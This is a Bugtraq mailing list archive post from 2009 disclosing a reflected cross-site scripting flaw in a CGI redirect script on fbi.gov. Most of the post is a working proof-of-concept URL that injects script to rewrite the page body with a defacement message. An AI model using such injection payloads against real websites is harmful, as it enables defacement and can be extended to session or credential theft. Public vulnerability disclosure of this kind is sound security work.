Bugtraq mailing list archives
FBI XSS Vulnerability
From: sohrab_behroozian () yahoo com
Date: 17 Jan 2009 08:06:40 -0000
by : Matrix (S.B) Ok it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Matrix submitted to Securityfocus (works only in Internet Explorer): http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'Matrix(S.B)'</script>
Current thread:
- FBI XSS Vulnerability sohrab_behroozian (Jan 17)